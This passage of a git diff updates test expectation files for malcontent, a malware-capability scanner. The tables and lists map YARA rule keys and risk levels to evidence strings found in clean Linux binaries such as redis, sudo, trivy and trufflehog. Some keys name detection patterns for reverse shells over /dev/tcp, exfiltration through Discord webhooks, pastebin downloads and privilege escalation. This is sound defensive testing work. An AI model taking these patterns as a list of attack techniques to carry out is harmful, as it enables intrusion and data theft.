[createPidFile](https://github.com/search?q=createPidFile&type=code) | +| MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | +| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [Check your memory ASAP !!!](https://github.com/search?q=Check+your+memory+ASAP+%21%21%21&type=code)
[Sentinel was not able to save the new configuration on disk!!!](https://github.com/search?q=Sentinel+was+not+able+to+save+the+new+configuration+on+disk%21%21%21&type=code) | +| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [ACLCheckPasswordHash](https://github.com/search?q=ACLCheckPasswordHash&type=code)
[ACLHashPassword](https://github.com/search?q=ACLHashPassword&type=code)
[authentication password for the default](https://github.com/search?q=authentication+password+for+the+default&type=code)
[bit user password](https://github.com/search?q=bit+user+password&type=code)
[checkPasswordBasedAuth](https://github.com/search?q=checkPasswordBasedAuth&type=code)
[for the output password](https://github.com/search?q=for+the+output+password&type=code)
[passwords](https://github.com/search?q=passwords&type=code)
[the number of password](https://github.com/search?q=the+number+of+password&type=code)
[tlsPasswordCallback](https://github.com/search?q=tlsPasswordCallback&type=code)
[username and password](https://github.com/search?q=username+and+password&type=code)
[username-password pair or user is](https://github.com/search?q=username-password+pair+or+user+is&type=code) | +| LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | +| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | +| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [evasion/process_injection/ptrace](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#known_ptrace_injectors) | known ptrace injectors | [BPF](https://github.com/search?q=BPF&type=code) | +| LOW | [exec/dylib/address_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) | +| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | +| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | +| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | +| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | +| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [ewriteConfigOverwriteFile](https://github.com/search?q=ewriteConfigOverwriteFile&type=code) | +| LOW | [fs/lock_update](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock) | apply or remove an advisory lock on a file | [flock](https://github.com/search?q=flock&type=code) | +| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/myredis.conf](https://github.com/search?q=%2Fetc%2Fmyredis.conf&type=code)
[/etc/rc.local](https://github.com/search?q=%2Fetc%2Frc.local&type=code)
[/etc/redis/](https://github.com/search?q=%2Fetc%2Fredis%2F&type=code)
[/etc/sentinel.conf](https://github.com/search?q=%2Fetc%2Fsentinel.conf&type=code)
[/etc/sysctl.conf](https://github.com/search?q=%2Fetc%2Fsysctl.conf&type=code) | +| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code) | +| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | +| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | +| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | +| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | +| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recv) | [receive a message to a socket](https://linux.die.net/man/2/recv) | [recv](https://github.com/search?q=recv&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#send) | [send a message to a socket](https://linux.die.net/man/2/send) | [send](https://github.com/search?q=send&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://redis.io/commands/slowlog](https://redis.io/commands/slowlog)
[https://redis.io/topics/latency-monitor.](https://redis.io/topics/latency-monitor.) | +| LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_create](https://github.com/search?q=epoll_create&type=code)
[epoll_wait](https://github.com/search?q=epoll_wait&type=code) | +| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | diff --git a/tests/linux/clean/rules.json.simple b/tests/linux/clean/rules.json.simple index f025f01ea..c8ae90917 100644 --- a/tests/linux/clean/rules.json.simple +++ b/tests/linux/clean/rules.json.simple @@ -21,7 +21,7 @@ data/compression/bzip2: low data/compression/lzma: low data/compression/zstd: low data/encoding/base64: low -discover/system/network: high +discover/system/network: medium discover/system/platform: low discover/user/name_get: medium evasion/bypass_security/linux/iptables: medium @@ -31,7 +31,6 @@ evasion/file/prefix: medium evasion/logging/acct: low evasion/process_injection/readelf: medium exec/plugin: low -exec/shell/bash_dev_tcp: high exec/shell/bash_dev_udp: medium exec/shell/nohup: medium exec/system_controls/apparmor: medium @@ -57,6 +56,7 @@ impact/exploit/cve: medium impact/remote_access/iptables: medium net/dns/servers: low net/download: medium +net/ftp/t: low net/http/cookies: medium net/socket/connect: medium net/tcp/sftp: medium diff --git a/tests/linux/clean/slack.md b/tests/linux/clean/slack.md index 6656a00a5..d21573c90 100644 --- a/tests/linux/clean/slack.md +++ b/tests/linux/clean/slack.md @@ -9,9 +9,9 @@ | MEDIUM | [anti-static/obfuscation/hex](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#hex_parse) | converts hex data to ASCII | [Buffer.from(padded, 'hex')](https://github.com/search?q=Buffer.from%28padded%2C+%27hex%27%29&type=code) | | MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [http://%s](http://%s)
[https://%s](https://%s) | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[allow_port](https://github.com/search?q=allow_port&type=code)
[any_port](https://github.com/search?q=any_port&type=code)
[basic_port](https://github.com/search?q=basic_port&type=code)
[check_ip](https://github.com/search?q=check_ip&type=code)
[debugPort](https://github.com/search?q=debugPort&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[endpoint_port](https://github.com/search?q=endpoint_port&type=code)
[firstIp](https://github.com/search?q=firstIp&type=code)
[hIp](https://github.com/search?q=hIp&type=code)
[hasPort](https://github.com/search?q=hasPort&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[inspectPort](https://github.com/search?q=inspectPort&type=code)
[internalPort](https://github.com/search?q=internalPort&type=code)
[kPort](https://github.com/search?q=kPort&type=code)
[lIp](https://github.com/search?q=lIp&type=code)
[localPort](https://github.com/search?q=localPort&type=code)
[messagePort](https://github.com/search?q=messagePort&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[midi_port](https://github.com/search?q=midi_port&type=code)
[multi_port](https://github.com/search?q=multi_port&type=code)
[next_port](https://github.com/search?q=next_port&type=code)
[on_ip](https://github.com/search?q=on_ip&type=code)
[origin_port](https://github.com/search?q=origin_port&type=code)
[pIp](https://github.com/search?q=pIp&type=code)
[parentPort](https://github.com/search?q=parentPort&type=code)
[parent_port](https://github.com/search?q=parent_port&type=code)
[peerPort](https://github.com/search?q=peerPort&type=code)
[peer_port](https://github.com/search?q=peer_port&type=code)
[publicPort](https://github.com/search?q=publicPort&type=code)
[public_ip](https://github.com/search?q=public_ip&type=code)
[quic_port](https://github.com/search?q=quic_port&type=code)
[quiche_ip](https://github.com/search?q=quiche_ip&type=code)
[received_ip](https://github.com/search?q=received_ip&type=code)
[relatedPort](https://github.com/search?q=relatedPort&type=code)
[remotePort](https://github.com/search?q=remotePort&type=code)
[requestPort](https://github.com/search?q=requestPort&type=code)
[required_ip](https://github.com/search?q=required_ip&type=code)
[seq_port](https://github.com/search?q=seq_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[server_ip](https://github.com/search?q=server_ip&type=code)
[set_port](https://github.com/search?q=set_port&type=code)
[simple_port](https://github.com/search?q=simple_port&type=code)
[sourcePort](https://github.com/search?q=sourcePort&type=code)
[source_port](https://github.com/search?q=source_port&type=code)
[stun_port](https://github.com/search?q=stun_port&type=code)
[target_ip](https://github.com/search?q=target_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[turn_port](https://github.com/search?q=turn_port&type=code)
[udp_port](https://github.com/search?q=udp_port&type=code)
[uv_ip](https://github.com/search?q=uv_ip&type=code)
[validatePort](https://github.com/search?q=validatePort&type=code)
[xIp](https://github.com/search?q=xIp&type=code)
[yoIp](https://github.com/search?q=yoIp&type=code) | +| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [server_address_](https://github.com/search?q=server_address_&type=code) | | MEDIUM | [c2/discovery/ip_dns_resolver](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/ip-dns_resolver.yara#google_dns_ip) | contains Google Public DNS resolver IP | [8.8.4.4](https://github.com/search?q=8.8.4.4&type=code)
[8.8.8.8](https://github.com/search?q=8.8.8.8&type=code) | | MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#remote_control) | Uses terms that may reference remote control abilities | [remote control](https://github.com/search?q=remote+control&type=code) | -| MEDIUM | [c2/server_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/server_address.yara#server_address) | references a 'server address', possible C2 client | [server_address_](https://github.com/search?q=server_address_&type=code) | | MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References 'dropper' | [dropper](https://github.com/search?q=dropper&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [zip_writer](https://github.com/search?q=zip_writer&type=code) | | MEDIUM | [collect/databases/leveldb](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/leveldb.yara#leveldb) | accesses LevelDB databases | [LEVELDB_DATABASE](https://github.com/search?q=LEVELDB_DATABASE&type=code)
[LEVELDB_ITERATOR](https://github.com/search?q=LEVELDB_ITERATOR&type=code)
[LEVELDB_TRANSACTION](https://github.com/search?q=LEVELDB_TRANSACTION&type=code)
[LevelDBEnv](https://github.com/search?q=LevelDBEnv&type=code)
[LevelDBIH](https://github.com/search?q=LevelDBIH&type=code)
[LevelDBIterator](https://github.com/search?q=LevelDBIterator&type=code)
[LevelDBOpenErrors](https://github.com/search?q=LevelDBOpenErrors&type=code)
[LevelDBPartitionedLock](https://github.com/search?q=LevelDBPartitionedLock&type=code)
[LevelDBReadErrors](https://github.com/search?q=LevelDBReadErrors&type=code)
[LevelDBScopesKey](https://github.com/search?q=LevelDBScopesKey&type=code)
[LevelDBScopesMetadata](https://github.com/search?q=LevelDBScopesMetadata&type=code)
[LevelDBScopesUndoTask](https://github.com/search?q=LevelDBScopesUndoTask&type=code)
[LevelDBTransaction](https://github.com/search?q=LevelDBTransaction&type=code)
[LevelDBWrapper](https://github.com/search?q=LevelDBWrapper&type=code)
[LevelDBWriteErrors](https://github.com/search?q=LevelDBWriteErrors&type=code)
[MojoLevelDB](https://github.com/search?q=MojoLevelDB&type=code)
[OpenAndVerifyLevelDBDatabase](https://github.com/search?q=OpenAndVerifyLevelDBDatabase&type=code)
[OpenLevelDBScopes](https://github.com/search?q=OpenLevelDBScopes&type=code)
[indexed_db_leveldb_operations](https://github.com/search?q=indexed_db_leveldb_operations&type=code)
[lazy_leveldb](https://github.com/search?q=lazy_leveldb&type=code)
[leveldbH](https://github.com/search?q=leveldbH&type=code)
[leveldb_0x](https://github.com/search?q=leveldb_0x&type=code)
[leveldb_chrome](https://github.com/search?q=leveldb_chrome&type=code)
[leveldb_database](https://github.com/search?q=leveldb_database&type=code)
[leveldb_proto](https://github.com/search?q=leveldb_proto&type=code)
[leveldb_scopes](https://github.com/search?q=leveldb_scopes&type=code)
[leveldb_value_store](https://github.com/search?q=leveldb_value_store&type=code)
[proto_leveldb_wrapper](https://github.com/search?q=proto_leveldb_wrapper&type=code)
[transactional_leveldb_iterator](https://github.com/search?q=transactional_leveldb_iterator&type=code) | @@ -26,7 +26,7 @@ | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [[](https://github.com/search?q=%3Chtml%3E&type=code)
[DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code)
[ifconfig](https://github.com/search?q=ifconfig&type=code)
[networkInterfaces](https://github.com/search?q=networkInterfaces&type=code) | | MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [macAddress](https://github.com/search?q=macAddress&type=code) | -| MEDIUM | [discover/process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | +| MEDIUM | [discover/process/name](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | | MEDIUM | [discover/process/runtime_deps](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/runtime_deps.yara#tls_get_addr) | [looks up thread private variables, may be used for loaded library discovery](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | | MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#npm_uname) | [get system identification](https://nodejs.org/api/process.html) | [process.arch](https://github.com/search?q=process.arch&type=code)
[process.platform](https://github.com/search?q=process.platform&type=code)
[process.versions](https://github.com/search?q=process.versions&type=code) | | MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) | @@ -107,7 +107,7 @@ | LOW | [data/hash/sha1](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha1.yara#SHA1) | Uses the SHA1 signature format | [SHA1_](https://github.com/search?q=SHA1_&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | | LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | -| LOW | [discover/process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | +| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | @@ -143,7 +143,6 @@ | LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | | LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) | | LOW | [hw/wireless](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/wireless.yara#bssid) | wireless network base station ID | [BSSID](https://github.com/search?q=BSSID&type=code)
[bssid](https://github.com/search?q=bssid&type=code) | -| LOW | [impact/exploit/GCONV_PATH](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/exploit/GCONV_PATH.yara#gconv_path) | references character conversion configuration | [GCONV_PATH](https://github.com/search?q=GCONV_PATH&type=code) | | LOW | [net/dns](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns.yara#go_dns_refs) | Uses DNS (Domain Name Service) | [require('dns')](https://github.com/search?q=require%28%27dns%27%29&type=code) | | LOW | [net/dns/servers](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-servers.yara#go_dns_refs_local) | Examines local DNS servers | [resolv.conf](https://github.com/search?q=resolv.conf&type=code) | | LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | diff --git a/tests/linux/clean/slirp4netns.simple b/tests/linux/clean/slirp4netns.simple index 59973f623..29b5561f0 100644 --- a/tests/linux/clean/slirp4netns.simple +++ b/tests/linux/clean/slirp4netns.simple @@ -1,4 +1,4 @@ -# linux/clean/slirp4netns: high +# linux/clean/slirp4netns: medium anti-behavior/LD_DEBUG: medium anti-behavior/LD_PROFILE: medium c2/addr/ip: medium @@ -9,7 +9,8 @@ credential/sniffer/bpf: medium discover/group/lookup: medium discover/network/interface_list: medium discover/network/mac_address: medium -discover/process/parent_pid_get: low +discover/process/parent: low +discover/system/dev_full: medium discover/system/platform: low discover/system/sysinfo: medium discover/user/HOME: low @@ -64,16 +65,13 @@ fs/tempdir/TMPDIR: low fs/unmount: low fs/watch: low hw/cpu: medium -impact/exploit/GCONV_PATH: low impact/reboot: low -impact/remote_access/reverse_shell: medium lateral/scan/tool: medium mem/anonymous_file: medium net/dns/reverse: medium net/dns/servers: low net/dns/txt: low net/download: medium -net/download/fetch: high net/ip/addr: medium net/ip/icmp: low net/ip/multicast_send: low diff --git a/tests/linux/clean/sudo.simple b/tests/linux/clean/sudo.simple index 3fa77a429..11c1f7965 100644 --- a/tests/linux/clean/sudo.simple +++ b/tests/linux/clean/sudo.simple @@ -1,7 +1,7 @@ # linux/clean/sudo: medium credential/password: low discover/network/interface_list: medium -discover/process/parent_pid_get: low +discover/process/parent: low discover/system/cpu_info: low discover/system/hostname_get: low discover/user/HOME: low @@ -27,6 +27,7 @@ fs/path/usr_sbin: low fs/path/var: low fs/permission/chown: low fs/proc/arbitrary_pid: medium +fs/proc/pid_exe: medium fs/tempdir/tempfile_create: low net/ip/string: medium net/socket/listen: medium @@ -34,7 +35,6 @@ net/socket/local_addr: low net/socket/receive: low net/socket/send: low os/kernel/seccomp: low -privesc/sudo: medium privesc/sudoers: low process/chroot: low process/groupid_set: low diff --git a/tests/linux/clean/tracer.o.aarch64.simple b/tests/linux/clean/tracer.o.aarch64.simple index 1864ab728..887baac34 100644 --- a/tests/linux/clean/tracer.o.aarch64.simple +++ b/tests/linux/clean/tracer.o.aarch64.simple @@ -4,6 +4,7 @@ collect/databases/mysql: medium discover/network/netstat: medium evasion/bypass_security/linux/iptables: medium evasion/logging/acct: low +evasion/process_injection/ptrace: low impact/remote_access/heartbeat: medium net/http/post: medium net/ip/multicast_send: low diff --git a/tests/linux/clean/trivy.simple b/tests/linux/clean/trivy.simple index 8a2a5453d..948f3b110 100644 --- a/tests/linux/clean/trivy.simple +++ b/tests/linux/clean/trivy.simple @@ -6,8 +6,8 @@ 3P/threat_hunting/privilegeescalation: medium c2/addr/http_dynamic: medium c2/addr/ip: medium +c2/addr/server: medium c2/discovery/ip_dns_resolver: medium -c2/server_address: medium c2/tool_transfer/download: medium c2/tool_transfer/github_raw: medium collect/archives/unarchive: medium @@ -53,7 +53,7 @@ discover/cloud/google_metadata: low discover/cloud/google_storage: low discover/network/mac_address: medium discover/network/netstat: medium -discover/process/name_get: medium +discover/process/name: medium discover/processes/list: medium discover/system/cpu_info: low discover/system/hostname_get: low @@ -66,6 +66,7 @@ evasion/file/location/chdir_unusual: medium evasion/file/location/dev_shm: medium evasion/file/location/var_run: medium evasion/file/prefix: medium +evasion/process_injection/ptrace: low exec/cmd: medium exec/conditional/LANG: low exec/dylib/symbol_address: medium diff --git a/tests/linux/clean/trufflehog.md b/tests/linux/clean/trufflehog.md index d21d13145..84d5c2ff3 100644 --- a/tests/linux/clean/trufflehog.md +++ b/tests/linux/clean/trufflehog.md @@ -3,7 +3,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|-------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_php_url_with_question) | contains hardcoded endpoint with a question mark | [https://api.mesibo.com/api.php?op=useradd&token=https](https://api.mesibo.com/api.php?op=useradd&token=https)
[https://api.route4me.com/api.v4/address_book.php?api_key=https](https://api.route4me.com/api.v4/address_book.php?api_key=https)
[https://api.websitepulse.com/textserver.php?method=GetContacts&username=](https://api.websitepulse.com/textserver.php?method=GetContacts&username=)
[https://us1.locationiq.com/v1/reverse.php?key=https](https://us1.locationiq.com/v1/reverse.php?key=https) | -| HIGH | [c2/tool_transfer/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/download.yara#download_sites) | [References known file hosting site](https://github.com/ditekshen/detection/blob/e6579590779f62cbe7f5e14b5be7d77b2280f516/yara/indicator_high.yar#L1001) | [pastebin.com](https://github.com/search?q=pastebin.com&type=code)
[pastebin.go](https://github.com/search?q=pastebin.go&type=code) | +| HIGH | [c2/tool_transfer/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/download.yara#download_sites) | [References known file hosting site](https://github.com/ditekshen/detection/blob/e6579590779f62cbe7f5e14b5be7d77b2280f516/yara/indicator_high.yar#L1001) | [pastebin.Scanner](https://github.com/search?q=pastebin.Scanner&type=code)
[pastebin.com/api/api_post](https://github.com/search?q=pastebin.com%2Fapi%2Fapi_post&type=code)
[pastebin.go](https://github.com/search?q=pastebin.go&type=code)
[pastebin.init](https://github.com/search?q=pastebin.init&type=code) | | HIGH | [c2/tool_transfer/grayware](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/grayware.yara#grayware_sites) | References websites that host code that can be used maliciously | [shodan.io](https://github.com/search?q=shodan.io&type=code) | | HIGH | [discover/ip/public](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/ip/public_ip.yara#iplookup_website) | public service to discover external IP address | [ipify.or](https://github.com/search?q=ipify.or&type=code) | | HIGH | [exfil/discord](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/discord.yara#discord_bot) | [Uses the Discord webhooks API](https://github.com/bartblaze/community/blob/3f3997f8c79c3605ae6d5324c8578cb12c452512/data/yara/binaries/indicator_high.yar#L706) | [discord.com/api/webhooks/](https://github.com/search?q=discord.com%2Fapi%2Fwebhooks%2F&type=code) | @@ -25,6 +25,7 @@ | MEDIUM | [anti-behavior/vm_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/vm-check.yara#vm_checker) | Checks to see if it is running with a VM | [GenuineIntel](https://github.com/search?q=GenuineIntel&type=code)
